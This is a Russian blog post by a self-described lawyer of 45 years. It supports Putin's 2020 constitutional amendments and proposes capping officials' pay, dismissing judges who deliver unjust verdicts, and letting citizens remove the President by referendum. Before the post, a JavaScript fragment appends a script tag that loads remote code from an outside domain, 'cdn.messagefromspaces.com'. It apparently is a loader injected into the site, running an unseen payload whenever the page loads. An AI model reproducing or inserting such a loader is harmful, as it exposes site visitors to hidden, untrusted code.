, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

А, что россияне могут предложить по изменению Конституции?

18 Янв

Обращаясь с Посланием к Федеральному Собранию, Путин высказал свои соображения по поводу возможных поправок в Конституции Российской Федерации.

Так, он предложил: — на конституционном уровне закрепить обязательные требования к лицам, которые занимают должности, критически важные для обеспечения безопасности и суверенитета страны.  Они не вправе иметь иностранное гражданство, вид на жительство либо иной документ, который позволяет постоянно проживать на территории другого государства; —  к лицам, претендующим на должность Президента Российской Федерации, закрепить требование о постоянном проживании на территории России не менее 25 лет, а также отсутствии иностранного гражданства или вида на жительство в другом государстве, причём не только на момент участия в выборах, но и когда бы то ни было ранее; — закрепить в Конституции норму о том, что минимальный размер оплаты труда в России не может быть ниже размера прожиточного минимума трудоспособного населения; — закрепить в Основном законе принципы достойного пенсионного обеспечения, имею в виду здесь и регулярную индексацию пенсий.

При этом Путин подчеркнул, что необходимо провести голосование граждан страны по всему пакету предложенных поправок в Конституции Российской Федерации. И только по его результатам принимать окончательное решение.

Путин считает, что мнение людей, наших граждан, народа как носителя суверенитета и главного источника власти должно быть определяющим.

Я, как частичка единственного источника власти в стране, многонационального народа, полностью поддерживаю данные поправки.

Лично мне стыдно за то, что  исполнительную и законодательную власть осуществляют лица, имеющие гражданство другой страны, фактически  ставшие народом другой страны, обладающие собственностью за рубежом, обучающие своих детей за границей…

Последние годы мне стыдно и за «телевизионную элиту» страны, что  содержится и  на деньги налогоплательщиков. Не скрывая того, что они богаты, получая за свой труд по 50−100 тысяч долларов в месяц, осуществляя идеологию, призывая к патриотизму, они  рассказывают нам о том, как плохо там, где они заимели недвижимость, получили гражданство, обустроились семьями.

Полагаю, что лица, осуществляющие идеологию, не вправе иметь иностранное гражданство, вид на жительство либо иной документ, который позволяет постоянно проживать на территории другого государства.

Сложившееся в стране неравенство в оплате труда, можно разрешить только конституционным урегулированием.

Если минимальный размер оплаты труда в России не может быть ниже размера прожиточного минимума трудоспособного населения, то заработная плата  всех депутатов, чиновников и лиц, работающих на госпредприятиях, должна его учитывать.

Зарубежный опыт демократических правовых государств показывает, что депутаты, сенаторы, чиновники получают зарплаты, превышающие средние по стране в 2−6 раз.

Полагаю, что следует  закрепить в Конституции норму о том, что заработная плата депутатов, министров, директоров госпредприятий, не может превышать 10−15 минимальных размеров оплаты труда в России.

Лица, осуществляющие государственную власть, сразу озаботятся увеличением минимальных заработных плат.

Это устранит явно несправедливый сегодня порядок оплаты труда. Например, Министр финансов Силуанов в месяц получает около 2 млн. рублей. Зная о том, что миллионы работающих россиян за свой труд получают в 160 раз меньше, он считает, что это очень даже справедливая для него зарплата.

Путин считает, что Россия должна оставаться в то же время президентской республикой, и у Президента должны сохраняться серьёзные полномочия, связанные с возможным отстранением от должности тех, кто нарушает закон, тех, кто недобросовестно исполняет свои служебные обязанности, и в связи с потерей доверия.

Именно поэтому Путин и предложил предусмотреть в Конституции полномочия Совета Федерации по представлению Президента России отрешать от должности судей Конституционного и Верховного Судов в случае совершения ими проступков, порочащих честь и достоинство, а также в иных случаях, предусмотренных федеральным конституционным законом, свидетельствующих о невозможности сохранения лицом статуса судьи.

Сложившееся в стране судопроизводство показало свою неспособность осуществлять правосудие, как вид государственной деятельности, осуществляемый с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

Ка практикующий более 45 лет юрист могу утверждать, что исключениями являются дела, когда судьи подчиняются, повинуются Конституции России и порядку судопроизводства, изложенному в процессуальных законах.

Даже в тех случаях, когда вышестоящие суды признают  неправосудными решения нижестоящих судов, судьи никакой ответственности за допущенный произвол не несут.

По делу моего доверителя  Костюхина судьи Тушинского районного суда г. Москвы дважды выносили неправосудные приговоры, назначая ему наказание в виде 15 лет лишения свободы за деяния, которые  Костюхин не совершал. Более 4 лет мне пришлось доказывать абсурдность приговоров, которые были отменены, но 12 судей, что на всех инстанциях признавали приговоры законными и обоснованными, никакой ответственности не понесли.

На свои неоднократные обращения к Президенту России, как к гаранту Конституции, я получал ответ, что он не полномочен вмешиваться в деятельность судебной власти.

А я и не просил вмешиваться, просил  гаранта Конституции, формирующего состав исполнителей судебной власти, лишить статуса тех, что не способен быть судьёй.

Теперь это станет возможно, и прекратятся пустые разговоры о независимости судей. Станут проверять, насколько судьи зависимы от требований Конституции и иных законов.

Учитывая, что дополнения и изменения Конституции конкретизируют права и обязанности гаранта Конституции, считаю, необходимым конституционно наделить единственный источник власти в стране, многонациональный народ, правом отрешения Президента России от должности, путём референдума, если он не исполняет обязанности гаранта Конституции.

Россияне должны иметь право не только высказываться, но и полномочия, связанные с возможным отстранением от должности главы государства,  недобросовестно исполняющего свои служебные обязанности, и  потерявшего доверие.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.